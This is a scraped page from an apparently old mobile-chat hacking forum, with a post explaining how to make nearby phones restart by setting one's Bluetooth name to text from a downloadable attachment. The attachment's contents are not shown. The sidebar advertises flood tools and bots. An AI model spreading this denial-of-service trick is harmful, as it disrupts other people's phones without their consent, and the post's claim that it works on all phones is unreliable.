Bd BUuZ ALL StArS HeRe
How to restart friends mobile using bluetooth Dj10
Register Here And Get Secret Tricks AND Software In Vip Arena
Bd BUuZ ALL StArS HeRe
How to restart friends mobile using bluetooth Dj10
Register Here And Get Secret Tricks AND Software In Vip Arena
Bd BUuZ ALL StArS HeRe
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Bd BUuZ ALL StArS HeRe

1st international nimbuzz forum

HomeLatest imagesSearchRegisterLog in
Latest topics
» CREATE NIMBUZZ ID BY XML
How to restart friends mobile using bluetooth EmptySun Dec 01, 2013 10:07 am by €du

» how to use xml scripts
How to restart friends mobile using bluetooth EmptySun Dec 01, 2013 10:04 am by €du

» Tools Flood For Nimbuzz
How to restart friends mobile using bluetooth EmptyFri Mar 22, 2013 4:42 am by jersky0622

» Bot 20 Autouu Message_v2.0
How to restart friends mobile using bluetooth EmptySat Feb 09, 2013 10:49 am by pasam--1

» add-flood2013
How to restart friends mobile using bluetooth EmptySun Feb 03, 2013 11:50 am by pasam--1

» vanhelsing multi nimbuzz tools v2.0
How to restart friends mobile using bluetooth EmptyWed Dec 26, 2012 3:31 am by ---snyper---

» Daily free flood ids www.abeoye.malware-site.www
How to restart friends mobile using bluetooth EmptySat Dec 08, 2012 10:28 pm by abe.oye

» plz upload new the link is dead
How to restart friends mobile using bluetooth EmptyWed Dec 05, 2012 11:05 am by somic2008

»  SEO MegaPack 2012
How to restart friends mobile using bluetooth EmptyMon Dec 03, 2012 9:45 am by game

Top posters
maxr0ckers
How to restart friends mobile using bluetooth I_vote_lcapHow to restart friends mobile using bluetooth I_voting_barHow to restart friends mobile using bluetooth I_vote_rcap 
power
How to restart friends mobile using bluetooth I_vote_lcapHow to restart friends mobile using bluetooth I_voting_barHow to restart friends mobile using bluetooth I_vote_rcap 
game
_rider_08
-=.diablo.=-
vabs_maurya
baurza
()~n!nja~()
tw!l!ghts
bratm.j
ADVERTISEMENT
hostcrz.com

How to restart friends mobile using bluetooth

Go down 
AuthorMessage
power
Diamond Member
Diamond Member
power

BDbuzZ Points : 5230

How to restart friends mobile using bluetooth Empty
PostSubject: How to restart friends mobile using bluetooth   How to restart friends mobile using bluetooth EmptyMon Apr 11, 2011 12:25 am

Just download the text attchment from below and transfer it ur phone, then copy the text of the attachment from ur phone using the copy feature of s60 phones and rename ur bluetooth name by pasting the text u hv copied. Now switch on ur bluetooth, whenever anybody tries to search nearby bluetooh devices to send files, his phone will restart . This process will go on and on if he tries to send u files. So just call ur frnds and silently switch on ur bluettoh and when they try to send files to each other their phone will restart. JUST ENJOY THE ENIGMATIC BEHAVIOR OF THE PHONE .
Works on all bluethooth enabled phone.

You Can Also Type Your Name In The Bluetooth Name But Remeber Do it Carefully Cause 1 Mistake Or Any Space This Will Not Work.
[url=http://rapidshare.com/files/91117583/bluetooth.txt.html ]http://rapidshare.com/files/91117583/bluetooth.txt.html [/url]
Back to top Go down

How to restart friends mobile using bluetooth
Page 1 of 1